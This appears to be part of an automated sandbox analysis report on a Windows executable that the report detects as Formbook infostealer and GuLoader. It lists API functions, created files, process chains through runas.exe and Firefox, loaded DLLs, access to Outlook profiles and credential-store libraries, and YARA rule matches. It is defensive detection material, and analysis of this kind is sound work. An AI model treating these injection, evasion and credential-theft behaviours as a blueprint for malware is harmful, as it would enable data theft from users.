        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357234E0 NtCreateMutant,LdrInitializeThunk,3_2_357234E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35722D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_35722D10
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35722B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_35722B90
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35723C30 NtOpenProcessToken,3_2_35723C30
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35723C90 NtOpenThread,3_2_35723C90
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357238D0 NtGetContextThread,3_2_357238D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35724570 NtSuspendThread,3_2_35724570
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004033A2 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A2
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004069730_2_00406973
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_70751B280_2_70751B28
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AF5C93_2_357AF5C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A75C63_2_357A75C6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357854903_2_35785490
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D4803_2_3575D480
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D6463_2_3579D646
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D62C3_2_3578D62C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AF6F63_2_357AF6F6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357636EC3_2_357636EC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3573717A3_2_3573717A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578D1303_2_3578D130
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF1133_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E03_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C03_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A70F13_2_357A70F1
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FB0D03_2_356FB0D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3572508C3_2_3572508C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AF3303_2_357AF330
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E13803_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A124C3_2_357A124C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD2EC3_2_356DD2EC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A7D4C3_2_357A7D4C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AFD273_2_357AFD27
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF43_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F9DD03_2_356F9DD0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F3C603_2_356F3C60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570FCE03_2_3570FCE0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789C983_2_35789C98
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356B1C9F3_2_356B1C9F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AFF633_2_357AFF63
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576FF403_2_3576FF40
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A1FC63_2_357A1FC6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A9ED23_2_357A9ED2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F1EB23_2_356F1EB2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356B99E83_2_356B99E8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357359C03_2_357359C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B8703_2_3570B870
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357658703_2_35765870
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AF8723_2_357AF872
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F98703_2_356F9870
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F38003_2_356F3800
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A78F33_2_357A78F3
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A18DA3_2_357A18DA
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357698B23_2_357698B2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AFB2E3_2_357AFB2E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3572DB193_2_3572DB19
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35781B803_2_35781B80
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570FAA03_2_3570FAA0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357AFA893_2_357AFA89
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BA5263_2_357BA526
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F04453_2_356F0445
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F27603_2_356F2760
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FA7603_2_356FA760
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A67573_2_357A6757
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 35725050 appears 34 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 35737BE4 appears 60 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 3576EF10 appears 36 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 3575E692 appears 52 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 356DB910 appears 172 times
        Source: FRA.0038253.exeStatic PE information: invalid certificate
        Source: FRA.0038253.exe, 00000003.00000003.2867931647.0000000035483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FRA.0038253.exe
        Source: FRA.0038253.exe, 00000003.00000002.2985481380.0000000035980000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FRA.0038253.exe
        Source: FRA.0038253.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/9@27/12
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004033A2 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00404789 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404789
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Program Files (x86)\Telepatisk.iniJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\marsJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Temp\nsx9EE9.tmpJump to behavior
        Source: FRA.0038253.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile read: C:\Users\user\Desktop\FRA.0038253.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
        Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess created: C:\Users\user\Desktop\FRA.0038253.exe "C:\Users\user\Desktop\FRA.0038253.exe"Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeProcess created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: credui.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: FRA.0038253.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: FRA.0038253.exe, FRA.0038253.exe, 00000003.00000003.2871696616.000000003550B000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2963043943.0000000004307000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000000.00000002.2678094371.0000000007F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_70751B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_70751B28
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356B97A1 push es; iretd 3_2_356B97A8
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721763 rdtsc 3_2_35721763
        Source: C:\Windows\SysWOW64\runas.exeWindow / User API: threadDelayed 9593Jump to behavior
        Source: C:\Users\user\Desktop\FRA.0038253.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\FRA.0038253.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep count: 9593 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\runas.exe TID: 1848Thread sleep time: -19186000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -130000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep count: 40 > 30Jump to behavior
        Source: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe TID: 6464Thread sleep time: -60000s >= -30000sJump to behavior
